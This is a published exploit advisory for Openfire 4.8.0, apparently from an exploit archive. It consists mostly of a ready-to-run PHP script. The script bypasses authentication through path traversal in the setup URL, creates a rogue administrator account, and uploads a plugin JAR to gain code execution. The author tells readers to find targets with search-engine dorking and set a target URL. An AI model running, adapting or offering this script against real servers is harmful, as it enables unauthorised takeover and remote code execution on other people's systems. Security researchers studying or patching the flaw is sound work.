Headline
Openfire 4.8.0 Code Injection
Openfire version 4.8.0 suffers from authentication bypass and code injection vulnerabilities.
=============================================================================================================================================| # Title : Openfire release 4.8.0 Code Injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) || # Vendor : https://www.igniterealtime.org/projects/openfire/ |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 115 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass OpenfireExploit{ private $targetUrl; private $adminUsername; private $adminPassword; private $pluginName; private $csrfToken; public function __construct($targetUrl, $adminUsername = null, $adminPassword = null, $pluginName = null) { $this->targetUrl = rtrim($targetUrl, '/') . '/'; $this->adminUsername = $adminUsername ?? $this->generateRandomString(8, 15); $this->adminPassword = $adminPassword ?? $this->generateRandomPassword(8, 10); $this->pluginName = $pluginName ?? $this->generateRandomString(8, 15); } private function generateRandomString($minLength, $maxLength) { $length = rand($minLength, $maxLength); return substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $length); } private function generateRandomPassword($minLength, $maxLength) { return bin2hex(random_bytes(rand($minLength, $maxLength) / 2)); } private function sendRequest($method, $uri, $data = null, $headers = []) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $this->targetUrl . $uri); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); if ($data) { curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } return curl_exec($ch); } private function getCsrfToken() { $response = $this->sendRequest('GET', 'login.jsp'); preg_match('/csrf=([^;]+)/', $response, $matches); return $matches[1] ?? null; } private function authBypass() { $this->sendRequest('GET', 'setup/setup-s/../../../../user-groups.jsp'); // Check if we can access the user-groups.jsp page return $this->sendRequest('GET', 'setup/setup-s/../../../../user-groups.jsp') !== false; } private function addAdminUser() { $this->csrfToken = $this->getCsrfToken(); $data = http_build_query([ 'csrf' => $this->csrfToken, 'username' => $this->adminUsername, 'password' => $this->adminPassword, 'passwordConfirm' => $this->adminPassword, 'isadmin' => 'on', 'create' => 'Create User' ]); return $this->sendRequest('POST', 'setup/setup-s/../../../../user-create.jsp', $data); } private function uploadPlugin($pluginFilePath) { $this->csrfToken = $this->getCsrfToken(); $cfile = new CURLFile($pluginFilePath); $data = [ 'uploadfile' => $cfile, 'csrf' => $this->csrfToken ]; $headers = ['Content-Type: multipart/form-data']; return $this->sendRequest('POST', 'plugin-admin.jsp', $data, $headers); } public function exploit() { if ($this->authBypass()) { echo "Authentication bypass successful.\n"; if ($this->addAdminUser()) { echo "Admin user '{$this->adminUsername}' added successfully.\n"; // Prepare plugin JAR file path $pluginJarPath = '/path/to/plugin.jar'; // Replace with actual path to the JAR file if ($this->uploadPlugin($pluginJarPath)) { echo "Plugin uploaded successfully.\n"; } else { echo "Failed to upload plugin.\n"; } } else { echo "Failed to add admin user.\n"; } } else { echo "Authentication bypass failed.\n"; } }}// Usage$exploit = new OpenfireExploit('http://target-openfire-url.com');$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================